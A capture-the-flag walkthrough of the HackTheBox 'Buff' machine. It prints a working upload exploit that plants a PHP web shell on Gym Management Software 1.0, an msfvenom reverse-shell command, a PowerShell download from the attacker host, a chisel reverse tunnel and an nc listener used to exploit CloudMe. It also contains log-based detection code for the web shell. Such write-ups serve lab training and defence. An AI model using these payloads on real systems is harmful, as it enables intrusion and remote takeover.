hackthebox – Buff

Nmap scan

nmap -A -Pn -oN nmap.txt 10.10.10.198
TCP port 8080 is found open.

Gym management software

This is the main page of the gym management web application.
The contact page shows the version: Gym Management Software 1.0.

Gym Management Software vulnerability

A web search turns up a published vulnerability for Gym Management Software version 1.0 – https://www.exploit-db.com/exploits/48506

The problem is that upload.php in the software package validates only the file extension and the file type; it never checks that the caller is authenticated.

Customized the original exploit script

import requests

# The following code is a modification from this source: https://www.exploit-db.com/exploits/48506

# The id is arbitrary since authentication is not verified; only the file extension
# and the file type are checked.
url = "http://10.10.10.198:8080/upload.php?id=cyruslab"
success = "http://10.10.10.198:8080/upload/cyruslab.php"

# https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/
png_magic_bytes = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"

png = {
    "file": (
        "cyruslab.php.png",
        f"{png_magic_bytes}<?php echo shell_exec($_GET['cmd']); ?>",
        "image/png",
        {"content-disposition": "form-data"}
    )
}

form_data = dict(pupload="upload")
resp = requests.post(url=url, files=png, data=form_data, verify=False)

if resp.status_code == 200:
    try:
        # Print whatever the server returns for each command to the terminal
        while True:
            user_input = input(">")
            cmd_output = requests.get(success, params={"cmd": user_input}, verify=False)
            if cmd_output.status_code == 200:
                print(cmd_output.text)
    except KeyboardInterrupt:
        print("\nBye!")

This is what the script output looks like. The prompt resembles a shell, but it is not one: the script uploads cyruslab.php to the vulnerable path, where the file contains:

<?php echo shell_exec($_GET['cmd']); ?>

and the script simply displays the result of each command back in the terminal.
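As an added example from the defender's side (not part of the original writeup), the following detection logic parses Apache-style access log lines and correlates a POST to upload.php?id=X with later requests to /upload/X.php that carry a cmd parameter, which is exactly the trace the weakness above leaves behind. The log lines, the detect_upload_webshell name and the alert fields are constructed assumptions, not captures from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the box);
# they mimic the request sequence the upload.php weakness produces.
SAMPLE_LOG = """\
10.10.14.9 - - [20/Jul/2020:10:01:02 +0000] "GET /contact.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"
10.10.14.9 - - [20/Jul/2020:10:01:10 +0000] "POST /upload.php?id=cyruslab HTTP/1.1" 200 512 "-" "python-requests/2.24.0"
10.10.14.9 - - [20/Jul/2020:10:01:15 +0000] "GET /upload/cyruslab.php?cmd=whoami HTTP/1.1" 200 31 "-" "python-requests/2.24.0"
10.10.14.9 - - [20/Jul/2020:10:01:20 +0000] "GET /upload/cyruslab.php?cmd=dir HTTP/1.1" 200 1900 "-" "python-requests/2.24.0"
10.10.14.20 - - [20/Jul/2020:10:05:00 +0000] "GET /upload/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    parts = urlsplit(ev["target"])
    ev["path"] = parts.path
    ev["query"] = parse_qs(parts.query)
    return ev


def detect_upload_webshell(log_text):
    """Alert on a POST to upload.php?id=X followed by /upload/X.php?cmd=... requests.

    Any PHP executed out of the upload directory is abnormal; tying it back to the
    upload that created it gives the responder the timestamp and source to pivot on.
    """
    uploads = {}  # upload id -> the POST event that created the file
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"].endswith("/upload.php"):
            for upload_id in ev["query"].get("id", []):
                uploads[upload_id] = ev
        if ev["path"].startswith("/upload/") and ev["path"].endswith(".php"):
            name = ev["path"].rsplit("/", 1)[-1][:-len(".php")]
            if name in uploads and "cmd" in ev["query"]:
                alerts.append({"src": ev["ip"], "shell": ev["path"],
                               "cmd": ev["query"]["cmd"][0], "uploaded_at": uploads[name]["ts"]})
    return alerts
```

Run against a real access log, the same correlation also highlights the uploading client and time window even when the upload itself returned 200 and looked like normal traffic.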

Get the user flag

Get the user’s flag after running the exploit

Cloudme and its vulnerability

Enumerating shaun's home directory, a CloudMe installer is found.

cloudme

CloudMe uses port 8888 and listens on localhost on the victim machine.

cloudme runs as a service

There is a working exploit written in Python: https://www.exploit-db.com/exploits/48389

The only item that needs to be changed in the original exploit script is the payload variable; the script's documentation recommends generating it with msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f python

Then replace the original payload variable in the script with the msfvenom output.

Lateral movement with chisel

Chisel can be downloaded here. Basically it is a proxy that can be used for port forwarding.

On the attacker machine start the chisel server:

On the victim machine, upload the Windows build of chisel.

Start the http server on attacker machine:

sudo python3 -m http.server 80

Then on victim machine run this command:

powershell Invoke-WebRequest -Uri http://10.10.14.9/chisel.exe -OutFile chisel.exe

Then on the victim machine run the chisel client:

chisel.exe client 10.10.14.9:8443 R:8888:127.0.0.1:8888

Successful connection will be like this:

Victim connects to the attacker machine
On attacker machine it will listen on port 8888

Whatever is sent to 127.0.0.1:8888 on the attacker machine is tunneled to the victim machine and delivered to its localhost:8888.

Get the root flag

Set up an nc listener on the attacker machine:

nc -lvnp 4444

The port has to match the msfvenom configuration previously generated.

Then run the exploit script with the configured msfvenom payload inserted.
